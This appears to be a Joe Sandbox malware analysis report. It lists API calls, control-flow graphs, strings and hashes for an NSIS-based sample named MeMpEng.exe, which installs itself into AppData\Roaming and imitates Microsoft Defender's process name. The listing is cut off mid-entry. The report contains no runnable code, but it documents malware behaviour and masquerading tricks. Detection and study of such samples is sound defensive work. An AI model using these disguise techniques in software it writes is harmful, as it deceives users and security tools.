                                                            • Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $1033$456$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\MeMpEng.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                          • API String ID: 1813718867-614624456
                                                          • Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                                          • Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
                                                          • Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                                          • Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 151 405718-405733 152 4058c2-4058c9 151->152 153 405739-405800 GetDlgItem * 3 call 404508 call 404e61 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 4058f3-405900 152->155 156 4058cb-4058ed GetDlgItem CreateThread CloseHandle 152->156 173 405802-40581c SendMessageW * 2 153->173 174 40581e-405821 153->174 158 405902-405908 155->158 159 40591e-405928 155->159 156->155 161 405943-40594c call 40453a 158->161 162 40590a-405919 ShowWindow * 2 call 404508 158->162 163 40592a-405930 159->163 164 40597e-405982 159->164 177 405951-405955 161->177 162->159 168 405932-40593e call 4044ac 163->168 169 405958-405968 ShowWindow 163->169 164->161 166 405984-40598a 164->166 166->161 175 40598c-40599f SendMessageW 166->175 168->161 171 405978-405979 call 4044ac 169->171 172 40596a-405973 call 4055d9 169->172 171->164 172->171 173->174 180 405831-405848 call 4044d3 174->180 181 405823-40582f SendMessageW 174->181 182 405aa1-405aa3 175->182 183 4059a5-4059d0 CreatePopupMenu call 406591 AppendMenuW 175->183 190 40584a-40585e ShowWindow 180->190 191 40587e-40589f GetDlgItem SendMessageW 180->191 181->180 182->177 188 4059d2-4059e2 GetWindowRect 183->188 189 4059e5-4059fa TrackPopupMenu 183->189 188->189 189->182 193 405a00-405a17 189->193 194 405860-40586b ShowWindow 190->194 195 40586d 190->195 191->182 192 4058a5-4058bd SendMessageW * 2 191->192 192->182 196 405a1c-405a37 SendMessageW 193->196 197 405873-405879 call 404508 194->197 195->197 196->196 199 405a39-405a5c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->199 197->191 200 405a5e-405a85 SendMessageW 199->200 200->200 201 405a87-405a9b GlobalUnlock SetClipboardData CloseClipboard 200->201 201->182
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405776
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405785
                                                          • GetClientRect.USER32 ref: 004057C2
                                                          • GetSystemMetrics.USER32 ref: 004057C9
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057EA
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FB
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040580E
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581C
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040582F
                                                          • ShowWindow.USER32(00000000,?), ref: 00405851
                                                          • ShowWindow.USER32(?,00000008), ref: 00405865
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405886
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405896
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058AF
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BB
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405794
                                                            • Part of subcall function 00404508: SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058D8
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000056AC,00000000), ref: 004058E6
                                                          • CloseHandle.KERNELBASE(00000000), ref: 004058ED
                                                          • ShowWindow.USER32(00000000), ref: 00405911
                                                          • ShowWindow.USER32(?,00000008), ref: 00405916
                                                          • ShowWindow.USER32(00000008), ref: 00405960
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405994
                                                          • CreatePopupMenu.USER32 ref: 004059A5
                                                          • AppendMenuW.USER32 ref: 004059B9
                                                          • GetWindowRect.USER32(?,?), ref: 004059D9
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F2
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2A
                                                          • OpenClipboard.USER32(00000000), ref: 00405A3A
                                                          • EmptyClipboard.USER32 ref: 00405A40
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4C
                                                          • GlobalLock.KERNEL32 ref: 00405A56
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6A
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A8A
                                                          • SetClipboardData.USER32 ref: 00405A95
                                                          • CloseClipboard.USER32 ref: 00405A9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {
                                                          • API String ID: 590372296-366298937
                                                          • Opcode ID: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
                                                          • Instruction ID: d944e331103d7d797bb7559e04b2c0af071990b1bd98ce6caf222631f3d5da7c
                                                          • Opcode Fuzzy Hash: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
                                                          • Instruction Fuzzy Hash: 47B13971900608FFDB11AF60DD85EAE7B79FB48354F10813AFA41B61A0CB788A51DF68
                                                          APIs
                                                            • Part of subcall function 729F12BB: GlobalAlloc.KERNEL32(00000040,?,729F12DB,?,729F137F,00000019,729F11CA,-000000A0), ref: 729F12C5
                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 729F1D2D
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 729F1D75
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 729F1D7F
                                                          • GlobalFree.KERNEL32(00000000), ref: 729F1D92
                                                          • GlobalFree.KERNEL32(?), ref: 729F1E74
                                                          • GlobalFree.KERNEL32(?), ref: 729F1E79
                                                          • GlobalFree.KERNEL32(?), ref: 729F1E7E
                                                          • GlobalFree.KERNEL32(00000000), ref: 729F2068
                                                          • lstrcpyW.KERNEL32(?,?), ref: 729F2222
                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 729F22A1
                                                          • LoadLibraryW.KERNEL32(00000008), ref: 729F22B2
                                                          • GetProcAddress.KERNEL32(?,?), ref: 729F230C
                                                          • lstrlenW.KERNEL32(00000808), ref: 729F2326
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                          • String ID:
                                                          • API String ID: 245916457-0
                                                          • Opcode ID: 4a3907a4bd67c4b86f563252429a7332e3a52f73827a73ce01826e26317d2bc2
                                                          • Instruction ID: f451db0bb02c345356d191ec3002a9df276a8381556b1356440b465d44b8645e
                                                          • Opcode Fuzzy Hash: 4a3907a4bd67c4b86f563252429a7332e3a52f73827a73ce01826e26317d2bc2
                                                          • Instruction Fuzzy Hash: 40228C72D04206DBCB95CFACC5807EDBBB8FF04319F28552ED166E6284E7B45681CB92

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 729 405c60-405c86 call 405f2b 732 405c88-405c9a DeleteFileW 729->732 733 405c9f-405ca6 729->733 734 405e1c-405e20 732->734 735 405ca8-405caa 733->735 736 405cb9-405cc9 call 406554 733->736 737 405cb0-405cb3 735->737 738 405dca-405dcf 735->738 742 405cd8-405cd9 call 405e6f 736->742 743 405ccb-405cd6 lstrcatW 736->743 737->736 737->738 738->734 740 405dd1-405dd4 738->740 744 405dd6-405ddc 740->744 745 405dde-405de6 call 4068b1 740->745 746 405cde-405ce2 742->746 743->746 744->734 745->734 753 405de8-405dfc call 405e23 call 405c18 745->753 749 405ce4-405cec 746->749 750 405cee-405cf4 lstrcatW 746->750 749->750 752 405cf9-405d15 lstrlenW FindFirstFileW 749->752 750->752 754 405d1b-405d23 752->754 755 405dbf-405dc3 752->755 769 405e14-405e17 call 4055d9 753->769 770 405dfe-405e01 753->770 758 405d43-405d57 call 406554 754->758 759 405d25-405d2d 754->759 755->738 757 405dc5 755->757 757->738 771 405d59-405d61 758->771 772 405d6e-405d79 call 405c18 758->772 761 405da2-405db2 FindNextFileW 759->761 762 405d2f-405d37 759->762 761->754 768 405db8-405db9 FindClose 761->768 762->758 765 405d39-405d41 762->765 765->758 765->761 768->755 769->734 770->744 775 405e03-405e12 call 4055d9 call 406314 770->775 771->761 776 405d63-405d6c call 405c60 771->776 782 405d9a-405d9d call 4055d9 772->782 783 405d7b-405d7e 772->783 775->734 776->761 782->761 785 405d80-405d90 call 4055d9 call 406314 783->785 786 405d92-405d98 783->786 785->761 786->761
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 00405C89
                                                          • lstrcatW.KERNEL32 ref: 00405CD1
                                                          • lstrcatW.KERNEL32 ref: 00405CF4
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3750,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 00405CFA
                                                          • FindFirstFileW.KERNEL32(007A3750,?,?,?,0040A014,?,007A3750,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 00405D0A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAA
                                                          • FindClose.KERNEL32(00000000), ref: 00405DB9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $C:\Users\user\AppData\Local\Temp\$P7z$\*.*
                                                          • API String ID: 2035342205-3945114116
                                                          • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                                          • Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
                                                          • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                                          • Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE
                                                          APIs
                                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?), ref: 0040224E
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive, xrefs: 0040228E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive
                                                          • API String ID: 542301482-2785362531
                                                          • Opcode ID: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
                                                          • Instruction ID: d027746e191c14b49f1eee61a42344c893d98f4f720128a79e15815c221bbdc7
                                                          • Opcode Fuzzy Hash: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
                                                          • Instruction Fuzzy Hash: 3B411675A00209AFCB00DFE4C989AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(7570D4C4,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                                          • FindClose.KERNEL32(00000000), ref: 004068C8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                                          • Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
                                                          • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                                          • Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                                          • Instruction ID: bedb772ef0a2f17f15cc30cd16f16fd49c67dd7be69949238e740b54367540b4
                                                          • Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                                          • Instruction Fuzzy Hash: 08F0E231A04100EAD700EBA4DA499AEB374FF04314F20417BE101F30E0D7B84D409B2D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 202 403fd4-403fe6 203 403fec-403ff2 202->203 204 40414d-40415c 202->204 203->204 205 403ff8-404001 203->205 206 4041ab-4041c0 204->206 207 40415e-4041a6 GetDlgItem * 2 call 4044d3 SetClassLongW call 40140b 204->207 208 404003-404010 SetWindowPos 205->208 209 404016-40401d 205->209 211 404200-404205 call 40451f 206->211 212 4041c2-4041c5 206->212 207->206 208->209 214 404061-404067 209->214 215 40401f-404039 ShowWindow 209->215 220 40420a-404225 211->220 217 4041c7-4041d2 call 401389 212->217 218 4041f8-4041fa 212->218 223 404080-404083 214->223 224 404069-40407b DestroyWindow 214->224 221 40413a-404148 call 40453a 215->221 222 40403f-404052 GetWindowLongW 215->222 217->218 237 4041d4-4041f3 SendMessageW 217->237 218->211 219 4044a0 218->219 232 4044a2-4044a9 219->232 229 404227-404229 call 40140b 220->229 230 40422e-404234 220->230 221->232 222->221 231 404058-40405b ShowWindow 222->231 235 404085-404091 SetWindowLongW 223->235 236 404096-40409c 223->236 233 40447d-404483 224->233 229->230 241 40423a-404245 230->241 242 40445e-404477 DestroyWindow EndDialog 230->242 231->214 233->219 240 404485-40448b 233->240 235->232 236->221 243 4040a2-4040b1 GetDlgItem 236->243 237->232 240->219 244 40448d-404496 ShowWindow 240->244 241->242 245 40424b-404298 call 406591 call 4044d3 * 3 GetDlgItem 241->245 242->233 246 4040d0-4040d3 243->246 247 4040b3-4040ca SendMessageW IsWindowEnabled 243->247 244->219 274 4042a2-4042de ShowWindow KiUserCallbackDispatcher call 4044f5 EnableWindow 245->274 275 40429a-40429f 245->275 248 4040d5-4040d6 246->248 249 4040d8-4040db 246->249 247->219 247->246 251 404106-40410b call 4044ac 248->251 252 4040e9-4040ee 249->252 253 4040dd-4040e3 249->253 251->221 255 404124-404134 SendMessageW 252->255 257 4040f0-4040f6 252->257 253->255 256 4040e5-4040e7 253->256 255->221 256->251 260 4040f8-4040fe call 40140b 257->260 261 40410d-404116 call 40140b 257->261 272 404104 260->272 261->221 270 404118-404122 261->270 270->272 272->251 278 4042e0-4042e1 274->278 279 4042e3 274->279 275->274 280 4042e5-404313 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404315-404326 SendMessageW 280->281 282 404328 280->282 283 40432e-40436d call 404508 call 403fb5 call 406554 lstrlenW call 406591 SetWindowTextW call 401389 281->283 282->283 283->220 294 404373-404375 283->294 294->220 295 40437b-40437f 294->295 296 404381-404387 295->296 297 40439e-4043b2 DestroyWindow 295->297 296->219 298 40438d-404393 296->298 297->233 299 4043b8-4043e5 CreateDialogParamW 297->299 298->220 300 404399 298->300 299->233 301 4043eb-404442 call 4044d3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->219 301->219 306 404444-404457 ShowWindow call 40451f 301->306 308 40445c 306->308 308->233
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
                                                          • ShowWindow.USER32(?), ref: 00404030
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404042
                                                          • ShowWindow.USER32(?,00000004), ref: 0040405B
                                                          • DestroyWindow.USER32 ref: 0040406F
                                                          • SetWindowLongW.USER32 ref: 00404088
                                                          • GetDlgItem.USER32(?,?), ref: 004040A7
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
                                                          • IsWindowEnabled.USER32(00000000), ref: 004040C2
                                                          • GetDlgItem.USER32(?,00000001), ref: 0040416D
                                                          • GetDlgItem.USER32(?,00000002), ref: 00404177
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404191
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
                                                          • GetDlgItem.USER32(?,00000003), ref: 00404288
                                                          • ShowWindow.USER32(00000000,?), ref: 004042A9
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
                                                          • EnableWindow.USER32(?,?), ref: 004042D6
                                                          • GetSystemMenu.USER32 ref: 004042EC
                                                          • EnableMenuItem.USER32 ref: 004042F3
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430B
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
                                                          • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
                                                          • SetWindowTextW.USER32 ref: 0040435C
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404490
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
